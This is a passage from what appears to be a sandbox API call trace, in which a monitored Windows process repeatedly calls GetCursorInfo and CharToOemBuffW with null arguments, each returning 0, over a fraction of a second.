lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.274] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.274] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.274] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.274] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.275] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.275] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.276] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.276] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.276] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.327] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.327] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.328] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.328] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.328] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.328] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.328] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.328] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.328] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.329] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.329] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.329] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.329] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.329] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.329] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.329] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.329] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.329] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.329] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.329] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.330] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.330] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.330] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.330] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.330] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.330] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.330] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.330] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.330] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.330] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.330] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.330] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.331] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.331] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.331] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.331] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.331] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.331] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.331] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.331] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.331] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.331] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.332] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.332] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.332] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.332] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.332] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.332] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.332] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.332] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.332] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.332] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.332] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.332] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.333] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.333] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.333] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.333] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.333] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.333] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.336] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.336] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.336] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.336] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.337] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.337] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.337] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.337] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.337] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.337] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.337] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.337] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.337] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.337] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.337] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.338] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.338] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.338] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.338] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.338] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.338] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.338] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.338] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.387] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.387] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.388] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.388] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.388] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.388] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.388] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.388] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.388] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.388] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.388] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.388] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.388] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.389] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.389] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.389] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.389] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.389] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.389] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.389] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.389] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.389] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.389] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.389] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.389] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.390] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.390] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.390] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.390] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.390] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.390] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.390] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.390] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.390] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.390] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.390] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.391] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.391] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.391] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.391] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.391] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.391] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.391] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.391] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.391] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.391] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.391] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.392] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.392] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.392] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.392] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.392] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.392] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.392] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.392] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.392] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.392] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.392] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.392] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.393] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.393] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.393] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.393] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.393] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.393] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.393] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.393] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.393] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.393] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.393] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.394] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.394] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.394] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.394] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.394] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.394] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.394] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.394] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.394] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.394] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.394] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.395] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.395] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.395] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.395] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.395] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.395] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.399] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.399] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.399] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.400] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.400] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.400] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.400] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.400] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.400] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.400] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.400] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.400] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.400] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.400] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.400] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.401] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.401] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.401] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.401] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.401] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.401] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.401] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.401] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.402] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.402] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.402] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.402] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.402] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.402] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.402] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.402] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.402] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.402] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.402] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.402] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.403] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.403] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.403] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.403] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.403] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.403] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.403] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.403] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.403] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.403] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.403] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.404] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.404] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.404] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.404] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.404] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.404] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.404] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.404] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.404] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.404] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.404] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.404] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.405] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.405] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.405] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.405] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.405] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.405] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.408] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.408] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.408] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.408] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.408] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.409] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.409] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.409] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.409] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.409] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.409] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.409] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.409] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.409] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.409] CharToOemBuffW (in: lpszSrc=0x0, lpszDst=0x0, cchDstLength=0x0 | out: lpszDst=0x0) returned 0 [0136.409] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0136.409] CharToOemBuffW (in: lpszSrc=0x0, 